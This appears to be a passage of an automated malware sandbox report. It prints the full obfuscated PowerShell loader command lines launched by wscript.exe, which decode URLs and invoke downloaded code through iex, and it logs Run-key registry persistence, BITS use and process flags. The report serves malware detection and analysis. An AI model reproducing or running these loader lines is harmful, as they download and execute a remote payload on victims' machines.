1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Cabinetted;++$Cabinetted;$Cabinetted=$Cabinetted-1;Function Cert69 ($Forretningsnavn){$Halvmaanedliges=5;$Halvmaanedliges++;For($Phylloscopine81=5; $Phylloscopine81 -lt $Forretningsnavn.Length-1; $Phylloscopine81+=$Halvmaanedliges){$Foreadapt = 'substring';$Slyngblte=$Forretningsnavn.$Foreadapt.Invoke($Phylloscopine81, 1);$Olfactible=$Olfactible+$Slyngblte}$Olfactible;}$uppishness=Cert69 'HypochfavnttDep.ct EkstpEl.dys Bowl: Libe/Snebo/Mornem IndiaBurnes DoomoOverl.ArmatgPolypeProj./ DesiwBeeswp Carp- Pr.va ygnid PanemEtaari AcrinFarad/KlassRT lkue BestcCompriResult Do seKartorKvi,keSupert Havo.Brn erVirusa Other In e ';$Wergilds=$uppishness.split([char]62);$uppishness=$Wergilds[0];$Batiste=Cert69 ' ForeiJurateAk hexMsurk ';$Sjusglas = Cert69 ' Lsni\ CymesNig eyVrtdys RediwNephroNuss wP.eud6Lymph4 Synt\havarWTan aicarponSam rdPol ro Dic.wIonpasAcardPResgso Arguw ReseeAnde rIndseS Frath sarceOmhyglPledglSeric\D plavSrdom1 .ytr.Rekur0St,ld\RepatpAlcoroskarpwUnorte,nglerUnagisIn.erhWifieeBlokel Flo.leuphe.NumereS.irixR,inoeParal ';&($Batiste) (Cert69 'Sterr$SkrivSAllo e Po.ykFe.lmsPos.tt Uncou Di.lr VrkssArgen=.onde$Ps.cheEpit.nBog nvTrla :m.ltew SbefiStrrenJ,rntd.amilisvrvgrGamet ') ;&($Batiste) (Cert69 'Askeb$Ra,gsS Cab,j O,gouSterss hiocgLarl.l GasbaAssems Per,=Cinqu$SarcoSVaabeeLit.ukUnm.nsRetintcompuuSkri,r luttsHanhu+Fravl$RelegS ndejSicyouPropos SplagmildelCr ssaFrotts S.rv ') ;&($Batiste) (Cert69 'Wayl,$CensuL LangeUnme.a llefCimb,wSilkeoBlderrAndelm ntes Fl.e Doku=Unrep Vexed(Afmel( ImaggTomhjwBagtrmHana.i Ev.n KursuwbortviProclnUdkrn3Uover2N.npa_Chinkp DietrJoggioOccupc DetoeDemensPseudsAxost propa-O.bytFLunyi IsoenPSeriorUnhypoTranscHatcheB,shbsolofss ubveItraved Appr=F.rre$Under{EthicP.unstI PhaeDUnpud}tvang),isco.TegucCAntaloU dermA socmP.digaF rtinmelildUkvemLAerosi OxygnChloreGitt.)Downh Boble-contrsUnnimp enetlWe biiUndert enfe Payi [Sleigc Ari,hBet aaSkkevr Acid]Un.in3Gevin4 opfi ');&($Batiste) (Cert69 'Krybe$ kretFHomofeRekrnmPol.ttAflydemil in TescaAudioaScenarConnis Kond Til =Disin Angli$Fu,dsL.isexeKontraSold,f KvalwChacro BrygrKaeftmCr.tisArr y[Krysa$ juniLnyanseByggea Sho,fLegemwimpoloVidtlrLakfamDuniesQ,adr.Quak cRespeoA.rusu onen,omictFerth- omkl2C,omp]Erst, ');&($Batiste) (Cert69 ' Unde$ .ircFbraysaKragesKmpehe UnstrBrystuTransmHoved= rrie( AdskT QualeAfgrssIntertUitot-Ra.urP.ompaaCrotctRegnsh npac Semit$c,ltoSDeaccj Tostu,rylls Udskg pseulFalbyaEncrysLi,id)Cereb N.rve-Kam.eA DrifnApperdS.alc Fu te(B.lan[SymboI Oro n ronatBrom,PkvalitScurrrNonfr]Uorga:Toba.:B.ithsUbevgi Forsz SquaeP,eud Scarl-Leucoe .illqCorad Distr8Palli)Manip ') ;if ($Faserum) {.$Sjusglas $Femtenaars;} else {;$Thysen=Cert69 'Ant.cSKogeptReaccaFysiorUnschtCalli-Ing.oBSengei,ircut FrdesSinusTTresirFicu.aCabbanQuonssHjem.f Melle.rbitr Hvae Verti- FidgSStemmoRgto,uWulfer FordcPernieGudst Fors $Unpa,uNitnipHybripDig eiLilyas SherhAlbat
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Cabinetted;++$Cabinetted;$Cabinetted=$Cabinetted-1;Function Cert69 ($Forretningsnavn){$Halvmaanedliges=5;$Halvmaanedliges++;For($Phylloscopine81=5; $Phylloscopine81 -lt $Forretningsnavn.Length-1; $Phylloscopine81+=$Halvmaanedliges){$Foreadapt = 'substring';$Slyngblte=$Forretningsnavn.$Foreadapt.Invoke($Phylloscopine81, 1);$Olfactible=$Olfactible+$Slyngblte}$Olfactible;}$uppishness=Cert69 'HypochfavnttDep.ct EkstpEl.dys Bowl: Libe/Snebo/Mornem IndiaBurnes DoomoOverl.ArmatgPolypeProj./ DesiwBeeswp Carp- Pr.va ygnid PanemEtaari AcrinFarad/KlassRT lkue BestcCompriResult Do seKartorKvi,keSupert Havo.Brn erVirusa Other In e ';$Wergilds=$uppishness.split([char]62);$uppishness=$Wergilds[0];$Batiste=Cert69 ' ForeiJurateAk hexMsurk ';$Sjusglas = Cert69 ' Lsni\ CymesNig eyVrtdys RediwNephroNuss wP.eud6Lymph4 Synt\havarWTan aicarponSam rdPol ro Dic.wIonpasAcardPResgso Arguw ReseeAnde rIndseS Frath sarceOmhyglPledglSeric\D plavSrdom1 .ytr.Rekur0St,ld\RepatpAlcoroskarpwUnorte,nglerUnagisIn.erhWifieeBlokel Flo.leuphe.NumereS.irixR,inoeParal ';&($Batiste) (Cert69 'Sterr$SkrivSAllo e Po.ykFe.lmsPos.tt Uncou Di.lr VrkssArgen=.onde$Ps.cheEpit.nBog nvTrla :m.ltew SbefiStrrenJ,rntd.amilisvrvgrGamet ') ;&($Batiste) (Cert69 'Askeb$Ra,gsS Cab,j O,gouSterss hiocgLarl.l GasbaAssems Per,=Cinqu$SarcoSVaabeeLit.ukUnm.nsRetintcompuuSkri,r luttsHanhu+Fravl$RelegS ndejSicyouPropos SplagmildelCr ssaFrotts S.rv ') ;&($Batiste) (Cert69 'Wayl,$CensuL LangeUnme.a llefCimb,wSilkeoBlderrAndelm ntes Fl.e Doku=Unrep Vexed(Afmel( ImaggTomhjwBagtrmHana.i Ev.n KursuwbortviProclnUdkrn3Uover2N.npa_Chinkp DietrJoggioOccupc DetoeDemensPseudsAxost propa-O.bytFLunyi IsoenPSeriorUnhypoTranscHatcheB,shbsolofss ubveItraved Appr=F.rre$Under{EthicP.unstI PhaeDUnpud}tvang),isco.TegucCAntaloU dermA socmP.digaF rtinmelildUkvemLAerosi OxygnChloreGitt.)Downh Boble-contrsUnnimp enetlWe biiUndert enfe Payi [Sleigc Ari,hBet aaSkkevr Acid]Un.in3Gevin4 opfi ');&($Batiste) (Cert69 'Krybe$ kretFHomofeRekrnmPol.ttAflydemil in TescaAudioaScenarConnis Kond Til =Disin Angli$Fu,dsL.isexeKontraSold,f KvalwChacro BrygrKaeftmCr.tisArr y[Krysa$ juniLnyanseByggea Sho,fLegemwimpoloVidtlrLakfamDuniesQ,adr.Quak cRespeoA.rusu onen,omictFerth- omkl2C,omp]Erst, ');&($Batiste) (Cert69 ' Unde$ .ircFbraysaKragesKmpehe UnstrBrystuTransmHoved= rrie( AdskT QualeAfgrssIntertUitot-Ra.urP.ompaaCrotctRegnsh npac Semit$c,ltoSDeaccj Tostu,rylls Udskg pseulFalbyaEncrysLi,id)Cereb N.rve-Kam.eA DrifnApperdS.alc Fu te(B.lan[SymboI Oro n ronatBrom,PkvalitScurrrNonfr]Uorga:Toba.:B.ithsUbevgi Forsz SquaeP,eud Scarl-Leucoe .illqCorad Distr8Palli)Manip ') ;if ($Faserum) {.$Sjusglas $Femtenaars;} else {;$Thysen=Cert69 'Ant.cSKogeptReaccaFysiorUnschtCalli-Ing.oBSengei,ircut FrdesSinusTTresirFicu.aCabbanQuonssHjem.f Melle.rbitr Hvae Verti- FidgSStemmoRgto,uWulfer FordcPernieGudst Fors $Unpa,uNitnipHybripDig eiLilyas SherhAlbatJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF8489D018D push ds; ret 3_2_00007FF8489D01B6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF8489D0108 push ds; ret 3_2_00007FF8489D01B6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF8489D5FF2 push ebx; retf 3_2_00007FF8489D5FFA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF8489D0327 pushad ; ret 3_2_00007FF8489D0346
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF8489D0347 push esi; ret 3_2_00007FF8489D0376
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF8489D1090 push es; ret 3_2_00007FF8489D10B6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF8489D00BD pushad ; iretd 3_2_00007FF8489D00C1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF8489D602B push ebx; retf 3_2_00007FF8489D602A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF8489D5FFB push ebx; retf 3_2_00007FF8489D602A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02C837B0 push F806AD31h; retf 5_2_02C83D8D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08C0508F push esp; iretd 5_2_08C05090
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08C00C5B push cs; iretd 5_2_08C00E31
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08C04473 push ebx; iretd 5_2_08C0441E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08C019D4 push ebx; ret 5_2_08C019D5
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08C041D6 push ebp; ret 5_2_08C041D7
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08C0096B push ss; retf 5_2_08C009A4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08C00935 push ss; retf 5_2_08C009A4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08C026EE push esi; ret 5_2_08C026EF
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08C05A73 push ebp; retf 5_2_08C05A78
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08C00E0B push cs; iretd 5_2_08C00E31
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08C043E0 push ebx; iretd 5_2_08C0441E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08C053E6 pushfd ; ret 5_2_08C053E3
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08C01F56 push ss; iretd 5_2_08C01F59

          Persistence and Installation Behavior

          barindex
          Powershell uses Background Intelligent Transfer Service (BITS)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: \KnownDlls32\BitsProxy.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: \KnownDlls32\BitsProxy.dllJump to behavior
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run obviouslyJump to behavior
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run obviouslyJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
